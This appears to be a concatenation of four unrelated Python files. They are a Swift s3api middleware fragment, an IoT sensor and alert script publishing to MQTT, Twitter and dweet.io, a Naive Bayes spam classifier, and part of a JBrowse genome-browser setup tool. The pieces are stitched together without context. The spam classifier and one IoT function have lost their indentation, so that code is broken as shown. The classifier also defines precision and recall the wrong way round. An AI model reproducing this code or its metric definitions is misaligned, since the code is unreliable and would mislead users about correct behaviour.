            conf.get('auth_pipeline_check', True))
        self.conf.max_upload_part_num = config_positive_int_value(
            conf.get('max_upload_part_num', 1000))
        self.conf.check_bucket_owner = config_true_value(
            conf.get('check_bucket_owner', False))
        self.conf.force_swift_request_proxy_log = config_true_value(
            conf.get('force_swift_request_proxy_log', False))
        self.conf.allow_multipart_uploads = config_true_value(
            conf.get('allow_multipart_uploads', True))
        self.conf.min_segment_size = config_positive_int_value(
            conf.get('min_segment_size', 5242880))
        self.conf.allowable_clock_skew = config_positive_int_value(
            conf.get('allowable_clock_skew', 15 * 60))

        self.logger = get_logger(
            conf, log_route=conf.get('log_name', 's3api'))
        # Validate middleware ordering at startup (may raise ValueError).
        self.check_pipeline(self.conf)

    def __call__(self, env, start_response):
        """WSGI entry point: translate S3 requests, pass others through."""
        try:
            req_class = get_request_class(env, self.conf.s3_acl)
            req = req_class(env, self.conf, self.app)
            resp = self.handle_request(req)
        except NotS3Request:
            # Not an S3-style request: hand the environ to the wrapped app.
            resp = self.app
        except InvalidSubresource as e:
            self.logger.debug(e.cause)
            # NOTE(review): this branch assigns no `resp`, so the code below
            # would hit an unbound local -- confirm whether
            # InvalidSubresource can actually propagate this far.
        except ErrorResponse as err_resp:
            if isinstance(err_resp, InternalError):
                self.logger.exception(err_resp)
            resp = err_resp
        except Exception as e:
            # Last-resort catch-all: surface as an S3 InternalError.
            self.logger.exception(e)
            resp = InternalError(reason=str(e))

        if isinstance(resp, S3ResponseBase) and 'swift.trans_id' in env:
            # Mirror Swift's transaction id into the S3 response headers.
            resp.headers['x-amz-id-2'] = env['swift.trans_id']
            resp.headers['x-amz-request-id'] = env['swift.trans_id']

        if 's3api.backend_path' in env and 'swift.backend_path' not in env:
            env['swift.backend_path'] = env['s3api.backend_path']
        return resp(env, start_response)

    def handle_request(self, req):
        """Dispatch *req* to its controller; raise MethodNotAllowed
        for unsupported or non-public methods."""
        self.logger.debug('Calling S3Api Middleware')
        try:
            controller = req.controller(self.app, self.conf, self.logger)
        except S3NotImplemented:
            # TODO: Probably we should distinct the error to log this warning
            self.logger.warning('multipart: No SLO middleware in pipeline')
            raise

        acl_handler = get_acl_handler(req.controller_name)(req, self.logger)
        req.set_acl_handler(acl_handler)

        if hasattr(controller, req.method):
            handler = getattr(controller, req.method)
            if not getattr(handler, 'publicly_accessible', False):
                raise MethodNotAllowed(req.method,
                                       req.controller.resource_type())
            res = handler(req)
        else:
            raise MethodNotAllowed(req.method,
                                   req.controller.resource_type())

        return res

    def check_pipeline(self, conf):
        """
        Check that proxy-server.conf has an appropriate pipeline for s3api.
        """
        if conf.get('__file__', None) is None:
            # Not loaded from a config file (e.g. tests): nothing to check.
            return

        ctx = loadcontext(loadwsgi.APP, conf.__file__)
        pipeline = str(PipelineWrapper(ctx)).split(' ')

        # Add compatible with 3rd party middleware.
        self.check_filter_order(pipeline, ['s3api', 'proxy-server'])

        # Everything between s3api and proxy-server is treated as the
        # auth section of the pipeline.
        auth_pipeline = pipeline[pipeline.index('s3api') + 1:
                                 pipeline.index('proxy-server')]

        # Check SLO middleware
        if self.conf.allow_multipart_uploads and 'slo' not in auth_pipeline:
            self.conf.allow_multipart_uploads = False
            self.logger.warning('s3api middleware requires SLO middleware '
                                'to support multi-part upload, please add it '
                                'in pipeline')

        if not conf.auth_pipeline_check:
            self.logger.debug('Skip pipeline auth check.')
            return

        if 'tempauth' in auth_pipeline:
            self.logger.debug('Use tempauth middleware.')
        elif 'keystoneauth' in auth_pipeline:
            # Keystone requires s3token before keystoneauth.
            self.check_filter_order(
                auth_pipeline,
                ['s3token', 'keystoneauth'])
            self.logger.debug('Use keystone middleware.')
        elif len(auth_pipeline):
            self.logger.debug('Use third party(unknown) auth middleware.')
        else:
            raise ValueError('Invalid pipeline %r: expected auth between '
                             's3api and proxy-server ' % pipeline)

    def check_filter_order(self, pipeline, required_filters):
        """
        Check that required filters are present in order in the pipeline.
        """
        indexes = []
        missing_filters = []
        for required_filter in required_filters:
            try:
                indexes.append(pipeline.index(required_filter))
            except ValueError as e:
                self.logger.debug(e)
                missing_filters.append(required_filter)

        if missing_filters:
            raise ValueError('Invalid pipeline %r: missing filters %r' % (
                pipeline, missing_filters))

        # Indexes must already be ascending for the order to be correct.
        if indexes != sorted(indexes):
            raise ValueError('Invalid pipeline %r: expected filter %s' % (
                pipeline, ' before '.join(required_filters)))
def filter_factory(global_conf, **local_conf):
    """Standard filter factory to use the middleware with paste.deploy"""
    conf = dict(global_conf)
    conf.update(local_conf)

    # Advertise the s3api capabilities via the /info endpoint.
    register_swift_info(
        's3api',
        # TODO: make default values as variables
        max_bucket_listing=conf.get('max_bucket_listing', 1000),
        max_parts_listing=conf.get('max_parts_listing', 1000),
        max_upload_part_num=conf.get('max_upload_part_num', 1000),
        max_multi_delete_objects=conf.get('max_multi_delete_objects', 1000),
        allow_multipart_uploads=conf.get('allow_multipart_uploads', True),
        min_segment_size=conf.get('min_segment_size', 5242880),
        s3_acl=conf.get('s3_acl', False)
    )

    def s3api_filter(app):
        # Wrap the app: listing-etag fixer innermost, s3api outermost.
        return S3ApiMiddleware(ListingEtagMiddleware(app), conf)

    return s3api_filter
| |
#!/usr/bin/python
import dweepy
import ConfigParser
import paho.mqtt.client as paho
import psutil
import signal
import sys
import time
import pyupm_grove as grove
import pyupm_i2clcd as lcd
from random import randint
from threading import Thread
from twython import Twython
import plotly.plotly as py
from plotly.graph_objs import Scatter, Layout, Figure, Data, Stream, YAxis
from tendo import singleton
def interruptHandler(signal, frame):
    """SIGINT handler: terminate the script cleanly."""
    sys.exit(0)
def mqttClientHandler():
    """Create an MQTT client connected to the public mosquitto broker."""
    client = paho.Client()
    client.on_publish = on_publish
    client.connect("test.mosquitto.org", 1883, 60)
    return client
def on_publish(mosq, obj, msg):
    """MQTT publish callback: nothing to do."""
    return None
def dataNetwork():
    """Return the total packet count (sent + received) since boot."""
    counters = psutil.net_io_counters()
    return counters.packets_sent + counters.packets_recv
def dataNetworkHandler(mqttclient):
    """Publish the packet counter over MQTT once per second, forever."""
    idDevice = "ThisDevice"
    while True:
        payload = idDevice + " " + str(dataNetwork())
        mqttclient.publish("IoT101/Demo", payload)
        time.sleep(1)
def on_message(mosq, obj, msg):
print "MQTT dataMessageHandler %s %s" % (msg.topic, msg.payload)
def dataMessageHandler():
    """Subscribe to the message topic and dispatch via on_message."""
    client = paho.Client()
    client.on_message = on_message
    client.connect("test.mosquitto.org", 1883, 60)
    client.subscribe("IoT101/Message", 0)
    while client.loop() == 0:
        pass
def dataPlotly():
    """Value streamed to plotly: alias for dataNetwork()."""
    return dataNetwork()
def dataPlotlyHandler():
    """Stream two series to a hosted plot.ly 'Network Health' figure.

    Reads plotly credentials and stream tokens from credentials.config,
    creates/updates the figure, then writes one point per stream every
    250 ms, forever.
    """
    configuration = ConfigParser.ConfigParser()
    configuration.read('credentials.config')
    username = configuration.get('plotly','username')
    apikey = configuration.get('plotly','apikey')
    streamtokentx = configuration.get('plotly','streamtokentx')
    streamtokenrx = configuration.get('plotly','streamtokenrx')
    py.sign_in(username, apikey)
    # One scatter trace per stream token (tx and rx).
    trace_network_tx = Scatter(
        x=[],
        y=[],
        stream=Stream(
            token=streamtokentx,
        ),
        yaxis='tx'
    )
    trace_network_rx = Scatter(
        x=[],
        y=[],
        stream=Stream(
            token=streamtokenrx,
        ),
        yaxis='rx'
    )
    layout = Layout(
        title='IoT Lab Network Health System',
        yaxis=YAxis(
            title='Bytes'
        ),
        yaxis2=YAxis(
            title='%',
            side='right',
            overlaying="y"
        )
    )
    data = Data([trace_network_tx, trace_network_rx])
    fig = Figure(data=data, layout=layout)
    # Create (or update) the hosted figure; prints its URL.
    print py.plot(fig, filename='IoT Lab Network Health System', auto_open=False)
    stream_network_tx = py.Stream(streamtokentx)
    stream_network_tx.open()
    stream_network_rx = py.Stream(streamtokenrx)
    stream_network_rx.open()
    counter = 0
    while True:
        # NOTE(review): net_io_counters() is fetched but unused; random
        # values are streamed instead -- presumably demo placeholders.
        output = psutil.net_io_counters()
        randoma = randint(0,1000)
        randomb = randint(0,1000)
        stream_network_tx.write({'x': counter, 'y': randoma })
        stream_network_rx.write({'x': counter, 'y': randomb })
        counter += 1
        time.sleep(0.25)
    # NOTE(review): unreachable -- the loop above never exits.
    stream_network_tx.close()
    stream_network_rx.close()
def twitterHandler():
    """Build an authenticated Twython client from credentials.config."""
    configuration = ConfigParser.ConfigParser()
    configuration.read('credentials.config')
    credentials = [
        configuration.get('twitter', option)
        for option in ('consumer_key', 'consumer_secret',
                       'access_token', 'access_token_secret')
    ]
    return Twython(*credentials)
def dataRotary(mqttclient):
    """Show a 'heart rate' reading from the rotary knob on the LCD.

    When the reading exceeds 950: turn the backlight red, trigger the
    buzzer via MQTT, tweet a warning, and publish the alarm to dweet.io.
    """
    knob = grove.GroveRotary(3)           # rotary angle sensor, analog pin 3
    myLcd = lcd.Jhd1313m1(0, 0x3E, 0x62)  # I2C RGB LCD on bus 0
    twythonid = twitterHandler()
    while True:
        abs = knob.abs_value()  # NOTE(review): shadows the builtin abs()
        myLcd.setCursor(0,0)
        myLcd.write('Health System')
        myLcd.setColor(0, 128, 0)
        myLcd.setCursor(1,0)
        myLcd.write('Heart Rate %s' % abs)
        # `while ... break` runs the alarm body at most once per reading.
        while (abs > 950):
            myLcd.setColor(255, 0, 0)
            id = str(randint(0,1000))
            status = "0x" + id + " #IoTLab Health System Heart Rate Warning " + str(abs)
            mqttclient.publish("IoTPy/Buzzer", "None")
            twythonid.update_status(status=status)
            data = {}
            data['alive'] = "1"
            data['warning'] = "1"
            data['message'] = status
            dweepy.dweet_for('IoTHealthSystem', data)
            time.sleep(1.5)
            # Clear the warning after the delay.
            data['warning'] = "0"
            data['message'] = ""
            dweepy.dweet_for('IoTHealthSystem', data)
            break
        time.sleep(0.25)
if __name__ == '__main__':
    # Ensure only one instance of this script runs at a time.
    me = singleton.SingleInstance()
    mqttclient = mqttClientHandler()
    signal.signal(signal.SIGINT, interruptHandler)
    # Background workers: packet publisher, message listener, plotly
    # streamer, and the rotary/LCD "heart rate" loop.
    threadx = Thread(target=dataNetworkHandler, args=(mqttclient,))
    threadx.start()
    thready = Thread(target=dataMessageHandler)
    thready.start()
    threadz = Thread(target=dataPlotlyHandler)
    threadz.start()
    threada = Thread(target=dataRotary, args=(mqttclient,))
    threada.start()
    print "Internet of Things Lab - Health System"
    button = grove.GroveButton(2)  # help button on digital pin 2
    # Baseline dweet: alive, no warning, no help needed.
    data = {}
    data['alive'] = "1"
    data['warning'] = "0"
    data['message'] = "No Message"
    data['help'] = "All Ok"
    dweepy.dweet_for('IoTHealthSystem', data)
    counter = 1
    while True:
        # While the button is held, dweet an escalating help counter.
        while button.value():
            data['help'] = "Help Needed! " + str(counter)
            dweepy.dweet_for('IoTHealthSystem', data)
            counter += 1
            time.sleep(1)
        time.sleep(0.1)
# End of File
| |
import numpy as np
import scipy.stats as stats
import sys
# lib eh a nossa biblioteca criada para este trabalho
import lib.naive_bayes as nb
import lib.preprocessing as prep
import lib.validation as valid
from config.constants import *
def case2(indexes=CASE_2_ATTRIBUTE_INDEXES,output=True):
accuracy_in_each_turn = list()
precision_in_each_turn_spam = list()
recall_in_each_turn_spam = list()
precision_in_each_turn_ham = list()
recall_in_each_turn_ham = list()
m = np.loadtxt(open("resources/normalized_data.csv","rb"),delimiter=',')
shuffled = np.random.permutation(m)
valid.validate_cross_validation(NUMBER_OF_ROUNDS,TRAIN_TEST_RATIO)
# equiprobable priors
prior_spam = 0.5
prior_ham = 0.5
for i in xrange(NUMBER_OF_ROUNDS):
# we're using cross-validation so each iteration we take a different
# slice of the data to serve as test set
train_set,test_set = prep.split_sets(shuffled,TRAIN_TEST_RATIO,i)
#parameter estimation
#but now we take 10 attributes into consideration
sample_means_word_spam = list()
sample_means_word_ham = list()
sample_variances_word_spam = list()
sample_variances_word_ham = list()
for attr_index in indexes:
sample_means_word_spam.append(nb.take_mean_spam(train_set,attr_index,SPAM_ATTR_INDEX))
sample_means_word_ham.append(nb.take_mean_ham(train_set,attr_index,SPAM_ATTR_INDEX))
sample_variances_word_spam.append(nb.take_variance_spam(train_set,attr_index,SPAM_ATTR_INDEX))
sample_variances_word_ham.append(nb.take_variance_ham(train_set,attr_index,SPAM_ATTR_INDEX))
#sample standard deviations from sample variances
sample_std_devs_spam = map(lambda x: x ** (1/2.0), sample_variances_word_spam)
sample_std_devs_ham = map(lambda x: x ** (1/2.0), sample_variances_word_ham)
hits = 0.0
misses = 0.0
#number of instances correctly evaluated as spam
correctly_is_spam = 0.0
#total number of spam instances
is_spam = 0.0
#total number of instances evaluated as spam
guessed_spam = 0.0
#number of instances correctly evaluated as ham
correctly_is_ham = 0.0
#total number of ham instances
is_ham = 0.0
#total number of instances evaluated as ham
guessed_ham = 0.0
# now we test the hypothesis against the test set
for row in test_set:
# ou seja, o produto de todas as prob. condicionais das palavras dada a classe
# eu sei que ta meio confuso, mas se olhar com cuidado eh bonito fazer isso tudo numa linha soh! =)
product_of_all_conditional_probs_spam = reduce(lambda acc,cur: acc * stats.norm(sample_means_word_spam[cur], sample_std_devs_spam[cur]).pdf(row[indexes[cur]]) , xrange(10), 1)
# nao precisa dividir pelo termo de normalizacao pois so queremos saber qual e o maior!
posterior_spam = prior_spam * product_of_all_conditional_probs_spam
product_of_all_conditional_probs_ham = reduce(lambda acc,cur: acc * stats.norm(sample_means_word_ham[cur], sample_std_devs_ham[cur]).pdf(row[indexes[cur]]) , xrange(10), 1)
posterior_ham = prior_ham * product_of_all_conditional_probs_ham
# whichever is greater - that will be our prediction
if posterior_spam > posterior_ham:
guess = 1
else:
guess = 0
if(row[SPAM_ATTR_INDEX] == guess):
hits += 1
else:
misses += 1
# we'll use these to calculate metrics
if (row[SPAM_ATTR_INDEX] == 1 ):
is_spam += 1
if guess == 1:
guessed_spam += 1
correctly_is_spam += 1
else:
guessed_ham += 1
else:
is_ham += 1
if guess == 1:
guessed_spam += 1
else:
guessed_ham += 1
correctly_is_ham += 1
#accuracy = number of correctly evaluated instances/
# number of instances
#
#
accuracy = hits/(hits+misses)
#precision_spam = number of correctly evaluated instances as spam/
# number of spam instances
#
#
# in order to avoid divisions by zero in case nothing was found
if(is_spam == 0):
precision_spam = 0
else:
precision_spam = correctly_is_spam/is_spam
#recall_spam = number of correctly evaluated instances as spam/
# number of instances evaluated as spam
#
#
# in order to avoid divisions by zero in case nothing was found
if(guessed_spam == 0):
recall_spam = 0
else:
recall_spam = correctly_is_spam/guessed_spam
#precision_ham = number of correctly evaluated instances as ham/
# number of ham instances
#
#
# in order to avoid divisions by zero in case nothing was found
if(is_ham == 0):
precision_ham = 0
else:
precision_ham = correctly_is_ham/is_ham
#recall_ham = number of correctly evaluated instances as ham/
# number of instances evaluated as ham
#
#
# in order to avoid divisions by zero in case nothing was found
if(guessed_ham == 0):
recall_ham = 0
else:
recall_ham = correctly_is_ham/guessed_ham
accuracy_in_each_turn.append(accuracy)
precision_in_each_turn_spam.append(precision_spam)
recall_in_each_turn_spam.append(recall_spam)
precision_in_each_turn_ham.append(precision_ham)
recall_in_each_turn_ham.append(recall_ham)
# calculation of means for each metric at the end
mean_accuracy = np.mean(accuracy_in_each_turn)
std_dev_accuracy = np.std(accuracy_in_each_turn)
variance_accuracy = np.var(accuracy_in_each_turn)
mean_precision_spam = np.mean(precision_in_each_turn_spam)
std_dev_precision_spam = np.std(precision_in_each_turn_spam)
variance_precision_spam = np.var(precision_in_each_turn_spam)
mean_recall_spam = np.mean(recall_in_each_turn_spam)
std_dev_recall_spam = np.std(recall_in_each_turn_spam)
variance_recall_spam = np.var(recall_in_each_turn_spam)
mean_precision_ham = np.mean(precision_in_each_turn_ham)
std_dev_precision_ham = np.std(precision_in_each_turn_ham)
variance_precision_ham = np.var(precision_in_each_turn_ham)
mean_recall_ham = np.mean(recall_in_each_turn_ham)
std_dev_recall_ham = np.std(recall_in_each_turn_ham)
variance_recall_ham = np.var(recall_in_each_turn_ham)
if output:
print "\033[1;32m"
print '============================================='
print 'CASE 2 - TEN ATTRIBUTES - USING NORMAL MODEL'
print '============================================='
print "\033[00m"
print 'MEAN ACCURACY: '+str(round(mean_accuracy,5))
print 'STD. DEV. OF ACCURACY: '+str(round(std_dev_accuracy,5))
print 'VARIANCE OF ACCURACY: '+str(round(variance_accuracy,8))
print ''
print 'MEAN PRECISION FOR SPAM: '+str(round(mean_precision_spam,5))
print 'STD. DEV. OF PRECISION FOR SPAM: '+str(round(std_dev_precision_spam,5))
print 'VARIANCE OF PRECISION FOR SPAM: '+str(round(variance_precision_spam,8))
print ''
print 'MEAN RECALL FOR SPAM: '+str(round(mean_recall_spam,5))
print 'STD. DEV. OF RECALL FOR SPAM: '+str(round(std_dev_recall_spam,5))
print 'VARIANCE OF RECALL FOR SPAM: '+str(round(variance_recall_spam,8))
print ''
print 'MEAN PRECISION FOR HAM: '+str(round(mean_precision_ham,5))
print 'STD. DEV. OF PRECISION FOR HAM: '+str(round(std_dev_precision_ham,5))
print 'VARIANCE OF PRECISION FOR HAM: '+str(round(variance_precision_ham,8))
print ''
print 'MEAN RECALL FOR HAM: '+str(round(mean_recall_ham,5))
print 'STD. DEV. OF RECALL FOR HAM: '+str(round(std_dev_recall_ham,5))
print 'VARIANCE OF RECALL FOR HAM: '+str(round(variance_recall_ham,8))
case2()
| |
#!/usr/bin/env python
import argparse
import codecs
import copy
import hashlib
import json
import logging
import os
import shutil
import struct
import subprocess
import tempfile
import xml.etree.ElementTree as ET
from collections import defaultdict
from Bio.Data import CodonTable
logging.basicConfig(level=logging.INFO)
log = logging.getLogger('jbrowse')
class ColorScaling(object):
    """Produces JBrowse per-feature colour configuration.

    Holds the javascript callback templates used to build ``style.color``
    functions, a rotating Brewer colour palette, and helpers to convert
    between hex and RGB and to derive score ranges from GFF files.
    """

    # Callback for tracks whose score lives directly on the feature (blast).
    # Doubled braces survive str.format(); {score}/{opacity}/{red}/{green}/
    # {blue} are substituted in parse_colours().
    COLOR_FUNCTION_TEMPLATE = """
    function(feature, variableName, glyphObject, track) {{
        var score = {score};
        {opacity}
        return 'rgba({red}, {green}, {blue}, ' + opacity + ')';
    }}
    """

    # Callback for qualitative tracks: walks up and down the feature tree
    # looking for 'color'/'score' attributes before falling back to the
    # user-specified or auto-generated colour.
    COLOR_FUNCTION_TEMPLATE_QUAL = """
    function(feature, variableName, glyphObject, track) {{
        var search_up = function self(sf, attr){{
            if(sf.get(attr) !== undefined){{
                return sf.get(attr);
            }}
            if(sf.parent() === undefined) {{
                return;
            }}else{{
                return self(sf.parent(), attr);
            }}
        }};

        var search_down = function self(sf, attr){{
            if(sf.get(attr) !== undefined){{
                return sf.get(attr);
            }}
            if(sf.children() === undefined) {{
                return;
            }}else{{
                var kids = sf.children();
                for(var child_idx in kids){{
                    var x = self(kids[child_idx], attr);
                    if(x !== undefined){{
                        return x;
                    }}
                }}
                return;
            }}
        }};

        var color = ({user_spec_color} || search_up(feature, 'color') || search_down(feature, 'color') || {auto_gen_color});
        var score = (search_up(feature, 'score') || search_down(feature, 'score'));
        {opacity}
        var result = /^#?([a-f\d]{{2}})([a-f\d]{{2}})([a-f\d]{{2}})$/i.exec(color);
        var red = parseInt(result[1], 16);
        var green = parseInt(result[2], 16);
        var blue = parseInt(result[3], 16);
        if(isNaN(opacity) || opacity < 0){{ opacity = 0; }}
        return 'rgba(' + red + ',' + green + ',' + blue + ',' + opacity + ')';
    }}
    """

    # Score -> opacity conversion snippets. 'linear' and 'logarithmic' are
    # themselves format templates ({min}/{max} substituted later); 'blast'
    # is literal javascript.
    # NOTE(review): the 'blast' snippet contains single braces, so calling
    # .format() on it (as the gene_calls branch does for other algos) would
    # raise -- presumably 'blast' is never selected for the gene_calls path;
    # verify against callers.
    OPACITY_MATH = {
        'linear': """
            var opacity = (score - ({min})) / (({max}) - ({min}));
        """,
        'logarithmic': """
            var opacity = (score - ({min})) / (({max}) - ({min}));
            opacity = Math.log10(opacity) + Math.log10({max});
        """,
        'blast': """
            var opacity = 0;
            if(score == 0.0) {
                opacity = 1;
            } else{
                opacity = (20 - Math.log10(score)) / 180;
            }
        """
    }

    BREWER_COLOUR_IDX = 0
    # Qualitative Brewer palette cycled through by _get_colours().
    BREWER_COLOUR_SCHEMES = [
        (166, 206, 227),
        (31, 120, 180),
        (178, 223, 138),
        (51, 160, 44),
        (251, 154, 153),
        (227, 26, 28),
        (253, 191, 111),
        (255, 127, 0),
        (202, 178, 214),
        (106, 61, 154),
        (255, 255, 153),
        (177, 89, 40),
        (228, 26, 28),
        (55, 126, 184),
        (77, 175, 74),
        (152, 78, 163),
        (255, 127, 0),
    ]

    # Diverging palettes: (low-end colour, high-end colour) per scheme name.
    BREWER_DIVERGING_PALLETES = {
        'BrBg': ("#543005", "#003c30"),
        'PiYg': ("#8e0152", "#276419"),
        'PRGn': ("#40004b", "#00441b"),
        'PuOr': ("#7f3b08", "#2d004b"),
        'RdBu': ("#67001f", "#053061"),
        'RdGy': ("#67001f", "#1a1a1a"),
        'RdYlBu': ("#a50026", "#313695"),
        'RdYlGn': ("#a50026", "#006837"),
        'Spectral': ("#9e0142", "#5e4fa2"),
    }

    def __init__(self):
        # Per-instance rotating index into BREWER_COLOUR_SCHEMES.
        self.brewer_colour_idx = 0

    def rgb_from_hex(self, hexstr):
        """Convert 'rrggbb' (no leading '#') to an (r, g, b) int tuple."""
        # http://stackoverflow.com/questions/4296249/how-do-i-convert-a-hex-triplet-to-an-rgb-tuple-and-back
        return struct.unpack('BBB', codecs.decode(hexstr, 'hex'))

    def min_max_gff(self, gff_file):
        """Return the (min, max) score (tab column 6) found in a GFF file.

        Lines without a parseable numeric score column are skipped.
        Returns (None, None) when no line yields a usable score.
        """
        min_val = None
        max_val = None
        with open(gff_file, 'r') as handle:
            for line in handle:
                try:
                    value = float(line.split('\t')[5])
                    # Compare against None explicitly: the previous
                    # `min_val or value` idiom treated a legitimate 0.0
                    # minimum as "unset" (0.0 is falsy) and clobbered it
                    # with the next value seen.
                    if min_val is None or value < min_val:
                        min_val = value
                    if max_val is None or value > max_val:
                        max_val = value
                except (IndexError, ValueError):
                    # Comment/header lines or non-numeric ('.') scores.
                    pass
        return min_val, max_val

    def hex_from_rgb(self, r, g, b):
        """Convert integer r, g, b components to a '#rrggbb' string."""
        return '#%02x%02x%02x' % (r, g, b)

    def _get_colours(self):
        """Return the next (r, g, b) in the Brewer palette, cycling forever."""
        r, g, b = self.BREWER_COLOUR_SCHEMES[self.brewer_colour_idx % len(self.BREWER_COLOUR_SCHEMES)]
        self.brewer_colour_idx += 1
        return r, g, b

    def parse_menus(self, track):
        """Build a menuTemplate track config from a track's <menus> options.

        The list is seeded with four empty dicts -- presumably placeholders
        for JBrowse's standard menu items; verify against the JBrowse docs.
        Custom entries from the XML are appended after them.
        """
        trackConfig = {'menuTemplate': [{}, {}, {}, {}]}

        if 'menu' in track['menus']:
            # A single <menu> arrives as a dict, several as a list; normalise.
            menu_list = [track['menus']['menu']]
            if isinstance(track['menus']['menu'], list):
                menu_list = track['menus']['menu']

            for m in menu_list:
                tpl = {
                    'action': m['action'],
                    'label': m.get('label', '{name}'),
                    'iconClass': m.get('iconClass', 'dijitIconBookmark'),
                }
                if 'url' in m:
                    tpl['url'] = m['url']
                if 'content' in m:
                    tpl['content'] = m['content']
                if 'title' in m:
                    tpl['title'] = m['title']

                trackConfig['menuTemplate'].append(tpl)

        return trackConfig

    def parse_colours(self, track, trackFormat, gff3=None):
        """Derive the style/colour config for one track.

        `track` is the parsed <options> dict, `trackFormat` one of
        'wiggle'/'blast'/'gene_calls'/..., and `gff3` a path used to
        auto-detect score ranges for gene-call tracks.
        """
        # Wiggle tracks have a bicolor pallete
        trackConfig = {'style': {}}
        if trackFormat == 'wiggle':

            trackConfig['style']['pos_color'] = track['wiggle']['color_pos']
            trackConfig['style']['neg_color'] = track['wiggle']['color_neg']

            if trackConfig['style']['pos_color'] == '__auto__':
                trackConfig['style']['neg_color'] = self.hex_from_rgb(*self._get_colours())
                trackConfig['style']['pos_color'] = self.hex_from_rgb(*self._get_colours())

            # Wiggle tracks can change colour at a specified place
            bc_pivot = track['wiggle']['bicolor_pivot']
            if bc_pivot not in ('mean', 'zero'):
                # The values are either one of those two strings
                # or a number
                bc_pivot = float(bc_pivot)
            trackConfig['bicolor_pivot'] = bc_pivot
        elif 'scaling' in track:
            if track['scaling']['method'] == 'ignore':
                # Flat colour: user-specified, or the next palette colour.
                if track['scaling']['scheme']['color'] != '__auto__':
                    trackConfig['style']['color'] = track['scaling']['scheme']['color']
                else:
                    trackConfig['style']['color'] = self.hex_from_rgb(*self._get_colours())
            else:
                # Scored method
                algo = track['scaling']['algo']
                # linear, logarithmic, blast
                scales = track['scaling']['scales']
                # type __auto__, manual (min, max)
                scheme = track['scaling']['scheme']
                # scheme -> (type (opacity), color)
                # ==================================
                # GENE CALLS OR BLAST
                # ==================================
                if trackFormat == 'blast':
                    red, green, blue = self._get_colours()
                    color_function = self.COLOR_FUNCTION_TEMPLATE.format(**{
                        'score': "feature._parent.get('score')",
                        'opacity': self.OPACITY_MATH['blast'],
                        'red': red,
                        'green': green,
                        'blue': blue,
                    })
                    trackConfig['style']['color'] = color_function.replace('\n', '')
                elif trackFormat == 'gene_calls':
                    # Default values, based on GFF3 spec
                    min_val = 0
                    max_val = 1000
                    # Get min/max and build a scoring function since JBrowse doesn't
                    if scales['type'] == 'automatic' or scales['type'] == '__auto__':
                        min_val, max_val = self.min_max_gff(gff3)
                    else:
                        min_val = scales.get('min', 0)
                        max_val = scales.get('max', 1000)

                    if scheme['color'] == '__auto__':
                        user_color = 'undefined'
                        auto_color = "'%s'" % self.hex_from_rgb(*self._get_colours())
                    elif scheme['color'].startswith('#'):
                        user_color = "'%s'" % self.hex_from_rgb(*self.rgb_from_hex(scheme['color'][1:]))
                        auto_color = 'undefined'
                    else:
                        user_color = 'undefined'
                        auto_color = "'%s'" % self.hex_from_rgb(*self._get_colours())

                    color_function = self.COLOR_FUNCTION_TEMPLATE_QUAL.format(**{
                        'opacity': self.OPACITY_MATH[algo].format(**{'max': max_val, 'min': min_val}),
                        'user_spec_color': user_color,
                        'auto_gen_color': auto_color,
                    })

                    trackConfig['style']['color'] = color_function.replace('\n', '')

        return trackConfig
def etree_to_dict(t):
    """Recursively convert an ElementTree element into nested dicts.

    Attributes become '@'-prefixed keys, repeated child tags collapse
    into lists, and text is stored under '#text' (or directly as the
    value for leaf elements with no attributes).
    """
    node = {t.tag: {} if t.attrib else None}

    kids = list(t)
    if kids:
        grouped = defaultdict(list)
        for converted in (etree_to_dict(kid) for kid in kids):
            for tag, value in converted.items():
                grouped[tag].append(value)
        # Single occurrences stay scalar; repeats become lists.
        node = {t.tag: {tag: vals[0] if len(vals) == 1 else vals
                        for tag, vals in grouped.items()}}

    if t.attrib:
        node[t.tag].update(('@' + key, val) for key, val in t.attrib.items())

    if t.text:
        stripped = t.text.strip()
        if kids or t.attrib:
            if stripped:
                node[t.tag]['#text'] = stripped
        else:
            node[t.tag] = stripped

    return node
# score comes from feature._parent.get('score') or feature.get('score')
# Directory containing this script; used to locate the bundled helper
# scripts (blastxml_to_gapped_gff3.py, gff3_rebase.py).
INSTALLED_TO = os.path.dirname(os.path.realpath(__file__))
class JbrowseConnector(object):
    """Builds a JBrowse data directory by shelling out to the perl tools
    bundled with a JBrowse release (prepare-refseqs.pl, flatfile-to-json.pl,
    add-track-json.pl, generate-names.pl, ...).

    `jbrowse` is the release folder, `outdir` the destination, `genomes` a
    list of FASTA paths, `standalone` copies the whole JBrowse release into
    `outdir`, and `gencode` selects the NCBI translation table used for the
    reference-sequence track.
    """

    def __init__(self, jbrowse, outdir, genomes, standalone=False, gencode=1):
        # Maps input dataset format -> flatfile-to-json.pl input flag.
        self.TN_TABLE = {
            'gff3': '--gff',
            'gff': '--gff',
            'bed': '--bed',
            'genbank': '--gbk',
        }

        self.cs = ColorScaling()
        self.jbrowse = jbrowse
        self.outdir = outdir
        self.genome_paths = genomes
        self.standalone = standalone
        self.gencode = gencode
        # Labels of tracks that generate_names() should index for search.
        self.tracksToIndex = []

        if standalone:
            # Ship a full copy of the JBrowse release alongside the data.
            self.clone_jbrowse(self.jbrowse, self.outdir)
        else:
            try:
                os.makedirs(self.outdir)
            except OSError:
                # Ignore if the folder exists
                pass

        self.process_genomes()
        self.update_gencode()

    def update_gencode(self):
        """Patch data/trackList.json so the sequence track uses the codons
        of the selected genetic code."""
        table = CodonTable.unambiguous_dna_by_id[int(self.gencode)]
        trackList = os.path.join(self.outdir, 'data', 'trackList.json')
        with open(trackList, 'r') as handle:
            trackListData = json.load(handle)

        # Track 0 is assumed to be the refseq track created by
        # prepare-refseqs.pl -- TODO confirm.
        trackListData['tracks'][0].update({
            'codonStarts': table.start_codons,
            'codonStops': table.stop_codons,
            'codonTable': table.forward_table,
        })

        with open(trackList, 'w') as handle:
            json.dump(trackListData, handle, indent=2)

    def subprocess_check_call(self, command):
        """Run `command` with cwd=outdir; raises CalledProcessError on failure."""
        log.debug('cd %s && %s', self.outdir, ' '.join(command))
        subprocess.check_call(command, cwd=self.outdir)

    def _jbrowse_bin(self, command):
        """Absolute path of a script inside the JBrowse release's bin/ folder."""
        return os.path.realpath(os.path.join(self.jbrowse, 'bin', command))

    def process_genomes(self):
        """Load every reference FASTA into the data directory."""
        for genome_path in self.genome_paths:
            self.subprocess_check_call([
                'perl', self._jbrowse_bin('prepare-refseqs.pl'),
                '--fasta', genome_path])

    def generate_names(self):
        """Build the name/search index for the collected tracks."""
        # Generate names
        args = [
            'perl', self._jbrowse_bin('generate-names.pl'),
            '--hashBits', '16'
        ]

